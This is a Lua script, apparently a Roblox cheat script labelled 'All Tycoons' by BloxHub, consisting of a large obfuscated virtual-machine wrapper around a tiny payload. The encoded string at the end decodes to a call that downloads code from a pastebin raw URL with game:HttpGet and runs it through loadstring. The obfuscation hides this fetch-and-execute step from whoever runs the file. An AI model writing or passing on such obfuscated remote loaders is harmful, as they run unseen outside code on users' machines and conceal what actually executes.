--[[

██████╗ ██╗      ██████╗ ██╗  ██╗██╗  ██╗██╗   ██╗██████╗ 
██╔══██╗██║     ██╔═══██╗╚██╗██╔╝██║  ██║██║   ██║██╔══██╗
██████╔╝██║     ██║   ██║ ╚███╔╝ ███████║██║   ██║██████╔╝
██╔══██╗██║     ██║   ██║ ██╔██╗ ██╔══██║██║   ██║██╔══██╗
██████╔╝███████╗╚██████╔╝██╔╝ ██╗██║  ██║╚██████╔╝██████╔╝
╚═════╝ ╚══════╝ ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ 
                      All Tycoons - © 2024 BloxHub. - All rights deserved.                           
]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v110=v5(v86,v19);v19=nil;return v110;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=0 -0 ;local v88;while true do if (v87==(0 -0)) then v88=(v31/(((7 -4) -1)^(v32-(1638 -(1523 + 114)))))%(((6 -2) -(3 -1))^(((v33-(620 -(555 + (414 -(87 + 263))))) -(v32-(932 -(857 + 74)))) + ((749 -(67 + 113)) -(367 + 201)))) ;return v88-(v88%(4 -3)) ;end end else local v89=927 -(214 + 713) ;local v90;while true do if (v89==(0 + 0)) then v90=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and 1) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v36 * (189 + 67)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (11 -8) );v18=v18 + ((696 + 260) -(802 + 150)) ;return (v40 * 16777216) + (v39 * (176444 -110908)) + (v38 * (464 -208)) + v37 ;end local function v24() local v41=0;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(1000 -(915 + 82))) then if (v46==0) then if (v45==0) then return v47 * (0 -(0 + 0)) ;else local v121=0 + 0 ;while true do if (v121==(0 -0)) then v46=(4336 -3148) -(1069 + (418 -300)) ;v44=0;break;end end end elseif (v46==(4643 -2596)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -(859 -(814 + 45)))))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 8) ) * (v44 + (v45/((793 -(368 + (1042 -619)))^(163 -111)))) ;end if (v41==(18 -(10 + 8))) then v42=v23();v43=v23();v41=3 -2 ;end if (v41==(1 + 1)) then v46=v20(v43,463 -(416 + 26) ,98 -67 );v47=((v20(v43,14 + 18 )==(1 -0)) and  -(439 -(145 + 293))) or 1 ;v41=433 -(44 + 386) ;end if (v41==1) then v44=1487 -(998 + 488) ;v45=(v20(v43,1 + 0 ,17 + 3 ) * ((774 -(201 + 571))^(1170 -(116 + 1022)))) + v42 ;v41=8 -6 ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(886 -(261 + 624)) );v18=v18 + v48 ;local v50={};for v66=1 -0 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==(1194 -(352 + 842))) then local v115=(function() return 0 -0 ;end)();local v116=(function() return;end)();while true do if (v115==0) then v116=(function() return 0;end)();while true do if (v116~=1) then else v91=(function() return  #"!";end)();break;end if ((1821 -(1483 + 338))~=v116) then else v92=(function() return v93();end)();v94=(function() return nil;end)();v116=(function() return 1696 -(1229 + 466) ;end)();end end break;end end end if (v91== #">") then if (v92== #"|") then v94=(function() return v93()~=0 ;end)();elseif (v92==2) then v94=(function() return v95();end)();elseif (v92~= #"asd") then else v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101) local v102=(function() return 0;end)();while true do if (v102==0) then v99[v100-#"[" ]=(function() return v101();end)();return v99,v100,v101;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"<",v57 do FlatIdent_1743D,Type,v21,Cons,v24,v25,v58,v68=(function() return v51(FlatIdent_1743D,Type,v21,Cons,v24,v25,v58,v68);end)();end v56[ #"xnx"]=(function() return v21();end)();for v69= #"}",v23() do local v70=(function() return v21();end)();if (v20(v70, #"}", #"{")~=(578 -(386 + 192))) then else local v106=(function() return 0;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v106~=0) then else local v119=(function() return 0;end)();while true do if (v119==(1207 -(696 + 510))) then v106=(function() return 1 -0 ;end)();break;end if (v119==0) then v107=(function() return v20(v70,2, #"-19");end)();v108=(function() return v20(v70, #"?id=",1268 -(1091 + 171) );end)();v119=(function() return 1;end)();end end end if (v106~=(1 + 1)) then else if (v20(v108, #":", #" ")== #"|") then v109[2]=(function() return v58[v109[6 -4 ]];end)();end if (v20(v108,6 -4 ,376 -(123 + 251) )== #",") then v109[ #"91("]=(function() return v58[v109[ #"-19"]];end)();end v106=(function() return 14 -11 ;end)();end if (v106~=(699 -(208 + 490))) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==0) then local v124=(function() return 0 + 0 ;end)();local v125=(function() return;end)();while true do if (v124==(0 + 0)) then v125=(function() return 836 -(660 + 176) ;end)();while true do if (0==v125) then v109[ #"xxx"]=(function() return v22();end)();v109[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"/") then v109[ #"19("]=(function() return v23();end)();elseif (v107==(1 + 1)) then v109[ #"xxx"]=(function() return v23() -((204 -(14 + 188))^(691 -(534 + 141))) ;end)();elseif (v107~= #"gha") then else local v169=(function() return 0 + 0 ;end)();local v170=(function() return;end)();while true do if (v169~=(0 + 0)) then else v170=(function() return 0 + 0 ;end)();while true do if (v170~=0) then else v109[ #"-19"]=(function() return v23() -((3 -1)^(25 -9)) ;end)();v109[ #"0313"]=(function() return v22();end)();break;end end break;end end end v106=(function() return 5 -3 ;end)();end if (3==v106) then if (v20(v108, #"91(", #"xnx")== #" ") then v109[ #"asd1"]=(function() return v58[v109[ #"0313"]];end)();end v53[v69]=(function() return v109;end)();break;end end end end for v71= #"/",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[573 -(426 + 146) ];local v64=v60[2 + 0 ];local v65=v60[2 + 1 ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=1457 -(282 + 1174) ;local v77= -(397 -(115 + 281));local v78={};local v79={...};local v80=v12("#",...) -1 ;local v81={};local v82={};for v103=0 -0 ,v80 do if (v103>=v74) then v78[v103-v74 ]=v79[v103 + 1 + 0 ];else v82[v103]=v79[v103 + ((1259 -(1043 + 214)) -1) ];end end local v83=(v80-v74) + (3 -2) ;local v84;local v85;while true do v84=v72[v76];v85=v84[868 -(550 + 317) ];if ((v85<=((22 -16) + 0)) or (3200<=3134)) then if (v85<=(2 -0)) then if (v85<=(0 -0)) then v82[v84[5 -3 ]]=v62[v84[(1500 -(323 + 889)) -(134 + 151) ]];elseif (v85==(1666 -((2610 -1640) + 695))) then v82[v84[3 -1 ]]=v84[1993 -(582 + 1408) ];else local v135=v84[6 -(584 -(361 + 219)) ];v82[v135]=v82[v135](v13(v82,v135 + 1 ,v77));end elseif ((v85<=(4 -0)) or (3275==1804)) then if (v85==(11 -8)) then do return;end else local v137=v84[2];local v138=v82[v84[1827 -(1195 + 629) ]];v82[v137 + (1 -0) ]=v138;v82[v137]=v138[v84[(565 -(53 + 267)) -(187 + 54) ]];end elseif ((v85>(534 -(406 + 123))) or (1417>3629)) then do return;end else local v142=v84[782 -(162 + 140 + 478) ];v82[v142]=v82[v142](v13(v82,v142 + (414 -(15 + 398)) + 0 ,v77));end elseif ((4795>402) and (v85<=(6 + 3))) then if (v85<=(14 -7)) then local v129=0 -0 ;local v130;local v131;while true do if (v129==(0 + 0)) then v130=v84[1638 -(1373 + 263) ];v131=v82[v84[(1985 -(18 + 964)) -(451 + 549) ]];v129=1 + 0 ;end if (((3 -2) -(0 + 0))==v129) then v82[v130 + (1 -0) ]=v131;v82[v130]=v131[v84[1388 -(746 + 638) ]];break;end end elseif (v85==(4 + 4)) then v82[v84[(2 + 0) -0 ]]=v84[8 -5 ];else local v146=v84[5 -(853 -(20 + 830)) ];local v147,v148=v75(v82[v146](v13(v82,v146 + (115 -(4 + 0 + 110)) ,v84[344 -(218 + 123) ])));v77=(v148 + v146) -(1428 -(41 + 1386)) ;local v149=1581 -(1535 + (172 -(116 + 10))) ;for v161=v146,v77 do local v162=0 + 0 ;while true do if (v162==0) then v149=v149 + 1 + 0 ;v82[v161]=v147[v149];break;end end end end elseif ((4813>3565) and (v85<=(31 -20))) then if (v85==(570 -(306 + 254))) then local v150=v84[1 + 1 ];local v151,v152=v75(v82[v150](v13(v82,v150 + (1 -0) ,v84[3])));v77=(v152 + v150) -(1468 -(899 + 42 + 526)) ;local v153=0 + 0 ;for v163=v150,v77 do v153=v153 + ((740 -(542 + 196)) -1) ;v82[v163]=v151[v153];end else v82[v84[3 -1 ]]=v62[v84[606 -(268 + (718 -383)) ]];end elseif (v85==(77 -(30 + 11 + 24))) then v82[v84[2]]();else v82[v84[292 -(60 + 230) ]]();end v76=v76 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F72344B5756444E6D00083Q00120B3Q00013Q00120B000100023Q002007000100010003001208000300044Q000A000100034Q00025Q00022Q000C3Q000100012Q00063Q00017Q00",v9(),...);